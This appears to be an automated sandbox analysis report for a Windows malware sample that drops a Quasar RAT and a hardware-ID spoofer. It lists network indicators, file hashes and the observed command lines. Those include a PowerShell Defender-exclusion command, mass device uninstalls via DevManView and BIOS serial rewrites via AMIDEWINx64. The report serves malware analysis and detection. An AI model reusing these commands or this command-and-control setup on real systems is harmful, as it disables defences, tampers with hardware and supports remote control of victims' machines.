"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe s: 45NC-UMFA
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe t: 7O6P-3ZMS
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe t: 7O6P-3ZMS
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe u: 9AZV-GF4V
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe u: 9AZV-GF4V
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe v: ZKGR-ZOP3
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe v: ZKGR-ZOP3
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe y: O38K-RLEI
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe y: O38K-RLEI
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\Disk.bat
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\amifldrv64.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\amide.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\DevManView.chm
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe z: 8FZG-IIZK
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\DevManView.cfg
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe z: 8FZG-IIZK
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | brofisthej.ddns.net | udp |
| SE | 2.70.186.204:4822 | brofisthej.ddns.net | tcp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 172.67.34.170:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | gaming7core.info | udp |
| RU | 45.15.156.156:80 | gaming7core.info | tcp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 34.117.186.192:443 | ipinfo.io | tcp |
| US | 8.8.8.8:53 | apps.identrust.com | udp |
| GB | 96.17.179.205:80 | apps.identrust.com | tcp |
Files
C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
| MD5 | 1421378b1fa1b2bec518c7b05c137359 |
| SHA1 | f9434edd2d2519865f650ad4983722b84b006310 |
| SHA256 | 9536b587fa1b06be4579cfb144cdb5d0ee43e265647a4d1e02205e0c845ed9d1 |
| SHA512 | fee464b29fc498dc58d9553b26a3818e95713682fc0072deca0a6e86027a168d4e2b55cb90c226e0b55d13f565d9fd3c42863a7ae1a8f2f3d797ce3d79adb599 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | afee842ff36d649e3a1756770bad94c0 |
| SHA1 | 4d95482ee57bdc9e0c80bad91a7d1f2009ad8621 |
| SHA256 | 964440431e83dfd5fd24d020381ca01ac978a9caa4222b20a42516edf2e51029 |
| SHA512 | 99715d5e262fe341df4524339c8626119dedbc448cafa9aa2e624c59c9bb49aa84499e1504c7825f73ffd0cb80a57457ae5ce3324b040da79f8ec45ebbd9543c |
C:\Users\Admin\AppData\Local\Temp\s3KUFe101b.bat
| MD5 | 7c069b491dab404fbd1d9cf5b4733884 |
| SHA1 | ad481b7dd17be9fa2e887009b465250dd8a922b2 |
| SHA256 | 253c4841a4c177b3522f65124a02ea36ee39bc84ca0456b05feb6127434f7ff9 |
| SHA512 | 86623f2006bc11ce881237168e879ead47122c54a6869f9a2ba25e24771a8be23a5398606b0a3c11f642e0cb8670589dd706cfc35d1c61b4e96a975337c75e15 |
C:\ProgramData\Microsoft\Windows\DevManView.exe
| MD5 | 33d7a84f8ef67fd005f37142232ae97e |
| SHA1 | 1f560717d8038221c9b161716affb7cd6b14056e |
| SHA256 | a1be60039f125080560edf1eebee5b6d9e2d6039f5f5ac478e6273e05edadb4b |
| SHA512 | c059db769b9d8a9f1726709c9ad71e565b8081a879b55d0f906d6927409166e1d5716c784146feba41114a2cf44ee90cf2e0891831245752238f20c41590b3f5 |
C:\ProgramData\Microsoft\Windows\DevManView.cfg
| MD5 | 43b37d0f48bad1537a4de59ffda50ffe |
| SHA1 | 48ca09a0ed8533bf462a56c43b8db6e7b6c6ffa8 |
| SHA256 | fc258dfb3e49be04041ac24540ef544192c2e57300186f777f301d586f900288 |
| SHA512 | cfb1d98328aed36d2fe9df008a95c489192f01d4bb20de329e69e0386129aff4634e6fd63a8d49e14fc96da75c9b5ed3a218425846907d0122267d50fc8d7a82 |
C:\ProgramData\Microsoft\Windows\Disk.bat
| MD5 | 250e75ba9aac6e2e9349bdebc5ef104e |
| SHA1 | 7efdaef5ec1752e7e29d8cc4641615d14ac1855f |
| SHA256 | 7d50c4fdcf6d8716c7d0d39517d479b3eeee02d2020ed635327405ae49c42516 |
| SHA512 | 7f0d7d41c9eafcd65daa674b5182cf52e11aa0f6d6baaee74fe4c4ffc08a163277c4981cd123af0cb1857ae6fd223b5e8c676d9dc5c646a870fbd9bc4001c438 |
\ProgramData\Microsoft\Windows\Volumeid64.exe
| MD5 | 81a45f1a91448313b76d2e6d5308aa7a |
| SHA1 | 0d615343d5de03da03bce52e11b233093b404083 |
| SHA256 | fb0d02ea26bb1e5df5a07147931caf1ae3d7d1d9b4d83f168b678e7f3a1c0ecd |
| SHA512 | 675662f84dfcbf33311f5830db70bff50b6e8a34a4a926de6369c446ea2b1cf8a63e9c94e5a5c2e1d226248f0361a1698448f82118ac4de5a92b64d8fdf8815d |
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
| MD5 | c4d09d3b3516550ad2ded3b09e28c10c |
| SHA1 | 7a5e77bb9ba74cf57cb1d119325b0b7f64199824 |
| SHA256 | 66433a06884f28fdabb85a73c682d1587767e1dfa116907559ec00ed8d0919d3 |
| SHA512 | 2e7800aae592d38c4a6c854b11d0883de70f938b29d78e257ab47a8a2bbf09121145d0a9aea9b56c16e18cde31b693d31d7ebfcd0473b7c15df5d7ae6708bbd2 |
C:\Recovery\7cc3d2c2-9b96-11ee-ab98-e6b52eba4e86\dllhost.exe
| MD5 | 79337964db81ce4114b63d41ffb36aa9 |
| SHA1 | be2adbff05b94d71e77f5afbf9dc88db287d9d02 |
| SHA256 | adb779423182df8da466c195d7162f9a2da10dbe0eb3221d82ab0a1d114a3abb |
| SHA512 | 13831d3e1bf8d92455cdd2e51d6397dbef1b83b6cb789f2eba7011671287c4449ca4337b6b3ed9576129b90f7c3c670eea7cbf4c4147f1ebe14a6d0f0b33584f |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | dd759eab95bc481e2b005b77097e6e97 |
| SHA1 | 3e10706368485b26411c7ab10be2e4671da635f9 |
| SHA256 | c2af03b9eafaa2796a851936aa5c842f9fca4b603b099a6a78be39b4f4a15aeb |
| SHA512 | 68322d03a3e81b20b21dc17affc165f1d41ea8a6f4784bef6e615534fa6107af5ff2b7aac4ca982f4de8b12c709d28bd4cdeab050316fd59264d721aa4796fb5 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 4f944271ab3bfa9f36c3fbd0525ccf67 |
| SHA1 | 35f22f87c68cae91e41f4449682a5b44de337a14 |
| SHA256 | 6477e36494de9cbf54c32fbc5b1368ea0ca877fb8d2d1d864e9f9d9d25236812 |
| SHA512 | 675307073139509f2bcb6aeb8c1a0870454d46cfbf2f6ed48ca4d61f2faa2ab8636aea5557d50f9d61815a465422efa564c5da3a10b11d610e7e5b766830549c |
Analysis: behavioral2
Detonation Overview
Submitted
2024-01-05 11:46
Reported
2024-01-05 11:50
Platform
win10v2004-20231215-en
Max time kernel
64s
Max time network
172s
Command Line
Signatures
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
Quasar RAT
Quasar payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Nirsoft
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Creates new service(s)
Stops running service(s)
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\18425dae9f0a49097d0abdd28ec465bfe2f4161b7849fb28494b8058a18ebcfc.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\SPOOFER.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\SPOOFER.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\SPOOFER.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2452 wrote to memory of 3684 | N/A | C:\Users\Admin\AppData\Local\Temp\18425dae9f0a49097d0abdd28ec465bfe2f4161b7849fb28494b8058a18ebcfc.exe | C:\Windows\system32\schtasks.exe |
| PID 2452 wrote to memory of 3684 | N/A | C:\Users\Admin\AppData\Local\Temp\18425dae9f0a49097d0abdd28ec465bfe2f4161b7849fb28494b8058a18ebcfc.exe | C:\Windows\system32\schtasks.exe |
| PID 2452 wrote to memory of 3512 | N/A | C:\Users\Admin\AppData\Local\Temp\18425dae9f0a49097d0abdd28ec465bfe2f4161b7849fb28494b8058a18ebcfc.exe | C:\Users\Admin\AppData\Local\Temp\SPOOFER.exe |
| PID 2452 wrote to memory of 3512 | N/A | C:\Users\Admin\AppData\Local\Temp\18425dae9f0a49097d0abdd28ec465bfe2f4161b7849fb28494b8058a18ebcfc.exe | C:\Users\Admin\AppData\Local\Temp\SPOOFER.exe |
| PID 2452 wrote to memory of 3512 | N/A | C:\Users\Admin\AppData\Local\Temp\18425dae9f0a49097d0abdd28ec465bfe2f4161b7849fb28494b8058a18ebcfc.exe | C:\Users\Admin\AppData\Local\Temp\SPOOFER.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\18425dae9f0a49097d0abdd28ec465bfe2f4161b7849fb28494b8058a18ebcfc.exe
"C:\Users\Admin\AppData\Local\Temp\18425dae9f0a49097d0abdd28ec465bfe2f4161b7849fb28494b8058a18ebcfc.exe"
C:\Users\Admin\AppData\Local\Temp\svchost.exe
"C:\Users\Admin\AppData\Local\Temp\svchost.exe"
C:\Users\Admin\AppData\Local\Temp\SPOOFER.exe
"C:\Users\Admin\AppData\Local\Temp\SPOOFER.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHgAYwBnACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGIAbQBtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGUAbQBxACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHgAZQB4ACMAPgA="
C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe
"C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe"
C:\Users\Admin\AppData\Roaming\conhost_sft.exe
"C:\Users\Admin\AppData\Roaming\conhost_sft.exe"
C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe
"C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe"
C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: JZH3-KRJ1
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: JZH3-KRJ1
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Disk.bat
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "WAN Miniport*" /use_wildcard""
C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "Disk drive*" /use_wildcard""
C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "D:\"
C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "SWD\WPDBUSENUM*" /use_wildcard""
C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "WAN Miniport*" /use_wildcard""
C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "STORAGE*" /use_wildcard""
C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "SCSI\Disk*" /use_wildcard""
C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "USBSTOR*" /use_wildcard""
C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "Disk&*" /use_wildcard""
C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "disk"
C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "Disk"
C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "G:\"
C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "F:\"
C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "E:\"
C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "C:\"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS %RANDOM%HP-TRGT%RANDOM%AB
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS 28756HP-TRGT27103AB
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 2%RANDOM%HP-TRGT%RANDOM%RV
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 428769HP-TRGT4560FA
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 4%RANDOM%HP-TRGT%RANDOM%FA
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 6%RANDOM%HP-TRGT%RANDOM%FU
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 328772HP-TRGT15309DQ
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 3%RANDOM%HP-TRGT%RANDOM%DQ
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 728772HP-TRGT15309MST
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 7%RANDOM%HP-TRGT%RANDOM%MST
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 628769HP-TRGT4560FU
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 528769HP-TRGT4560SL
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 5%RANDOM%HP-TRGT%RANDOM%SL
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 828769HP-TRGT4560SG
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 8%RANDOM%HP-TRGT%RANDOM%SG
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 228769HP-TRGT4560RV
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 6%RANDOM%HP-TRGT%RANDOM%FU
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 7%RANDOM%HP-TRGT%RANDOM%MST
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 728788HP-TRGT3515MST
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 628788HP-TRGT3515FU
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 328788HP-TRGT3515DQ
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 428788HP-TRGT3515FA
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 528788HP-TRGT3515SL
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 3%RANDOM%HP-TRGT%RANDOM%DQ
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 828788HP-TRGT3515SG
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 4%RANDOM%HP-TRGT%RANDOM%FA
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 228788HP-TRGT3515RV
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 5%RANDOM%HP-TRGT%RANDOM%SL
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS 28788HP-TRGT3515AB
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 8%RANDOM%HP-TRGT%RANDOM%SG
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 2%RANDOM%HP-TRGT%RANDOM%RV
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS %RANDOM%HP-TRGT%RANDOM%AB
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS 28805HP-TRGT24489AB
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 6%RANDOM%HP-TRGT%RANDOM%FU
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 328805HP-TRGT24489DQ
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 728805HP-TRGT24489MST
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 628805HP-TRGT24489FU
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 7%RANDOM%HP-TRGT%RANDOM%MST
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 428805HP-TRGT24489FA
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 3%RANDOM%HP-TRGT%RANDOM%DQ
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 528805HP-TRGT24489SL
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 4%RANDOM%HP-TRGT%RANDOM%FA
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 5%RANDOM%HP-TRGT%RANDOM%SL
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 828805HP-TRGT24489SG
